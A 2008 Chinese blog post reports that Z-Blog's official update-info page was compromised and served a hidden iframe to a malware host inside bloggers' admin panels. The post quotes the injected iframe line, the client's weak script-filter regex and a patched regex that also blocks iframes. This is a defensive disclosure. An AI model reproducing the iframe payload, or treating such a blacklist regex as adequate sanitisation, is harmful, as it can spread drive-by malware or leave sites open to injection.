« 换肤漂亮小狗图片一张 »

zblog官方通讯程序危险代码过滤不全,官方染毒bloggers也遭殃

密陀僧发布 技术 2008年3月5日 次浏览
登录后台有病毒提示的小盆友们请注意,不是因为你自己的网站感染病毒了,而是官方网站感染病毒了。
官方的自动通讯页面http://update.rainbowsoft.org/info/被加了<iframe src=http://c.j8j8.biz/103/ width=100 height=0></iframe>,估计是被arp了。

zblog通过/admin/c_updateinfo.asp这个页面与官方进行通讯,过滤代码仅仅使用了一段script的过滤正则表达式,如下

objRegExp.Pattern="<script.*/*>|</script>|<[a-zA-Z][^>]*=['""]+javascript:\w+.*['""]+>|<\w+[^>]*\son\w+=.*[ /]*>"


补救方法:
1、通知zblog管理员清除病毒
2、修改过滤代码:objRegExp.Pattern="<script.*/*>|</script>|<[a-zA-Z][^>]*=['""]+javascript:\w+.*['""]+>|<\w+[^>]*\son\w+=.*[ /]*>|<iframe.*/*>|</iframe>"
转载请注明:转载自漱风斋[ http://0e2.net/ ]

本文链接地址:http://0e2.net/post/1029.html
  • 和尚,这个应该发论坛去,或者联系zx。。。
    密陀僧 于 2008-3-5 22:17:35 回复
    发到论坛了
    见:http://bbs.rainbowsoft.org/thread-21059-1-1.html
    官方动作很快,碰到一个白痴问我知不知道什么是arp


  • 评论作者:gaowhen——2008-3-5 21:56:09 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright 2009-3000 0e2.net. Some Rights Reserved.  Powered By Z-Blog.